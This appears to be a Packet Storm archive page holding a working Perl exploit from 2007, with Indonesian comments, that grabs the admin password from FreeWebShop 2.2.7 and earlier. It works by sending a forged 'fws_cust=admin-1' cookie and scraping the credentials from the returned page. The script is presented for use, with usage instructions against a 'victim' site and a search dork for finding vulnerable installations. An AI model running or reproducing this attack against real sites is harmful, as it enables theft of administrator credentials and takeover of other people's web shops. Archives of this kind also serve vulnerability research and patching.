exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

freewebshop-passwd.txt

freewebshop-passwd.txt
Posted Dec 18, 2007
Authored by k1tk4t | Site newhack.org

FreeWebShop versions 2.2.7 and below remote admin password grabber exploit.

tags | exploit, remote
SHA-256 | d7d88ab38b5769de456c878d45893e4515fa013bdfcb5240adfbaf5ea40cf5aa
Download | Favorite | View

freewebshop-passwd.txt

Change Mirror Download
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# FreeWebshop <= 2.2.7 - (cookie) Admin Password Grabber Exploit
# Waktu      :  Dec 17 2007 04:50AM
# Software    :  FreeWebshop <= 2.2.7
# Vendor    :  http://www.freewebshop.org/
# Demo Site    :  http://www.freewebshop.org/demo/
# Ditemukan oleh  :  k1tk4t  |  http://newhack.org
# Lokasi    :  Indonesia
# Dork      :  "Powered by FreeWebshop"
#
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Cookie Injection]------------------------------------
use LWP::UserAgent;
use HTTP::Cookies;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |         Indonesian Newhack Technology           |";
 print "\n  |-------------------------------------------------|";
 print "\n  |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] ";
 print "\n[!] Contoh     : perl freewebshop227.pl http://korban.site /WebShop/";
 print "\n[!] ";
 print "\n";
 exit;
}

my $site = $ARGV[0]; # Site Target
my $path = $ARGV[1]; # Path direktori envolution_1-0-1

my $www = new LWP::UserAgent;
#my @cookie = ('Cookie' => "cookie_info=admin-1"); #Untuk Versi < = 2.2.4
my @cookie = ('Cookie' => "fws_cust=admin-1"); #Untuk Versi > = 2.2.6
my $http = "$site/$path/index.php?page=customer&action=show";
print "\n\n [~] Sedang Mencari Username dan Password.... \n";
my $injek = $www -> get($http, @cookie);
my $jawaban = $injek -> content;
if( $jawaban =~ /login value='(.*)'/ ){ print "\n [+] Username: $1"; 
$jawaban =~ /"password" name="pass1" size="10" maxlength="10" value="(.*)"/ , print "\n [+] Password: $1 \n";} 
else {print "\n [-] Gagal :( , Coba yang lain!";}

# ----------------------------[Selesai]------------------------------------
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close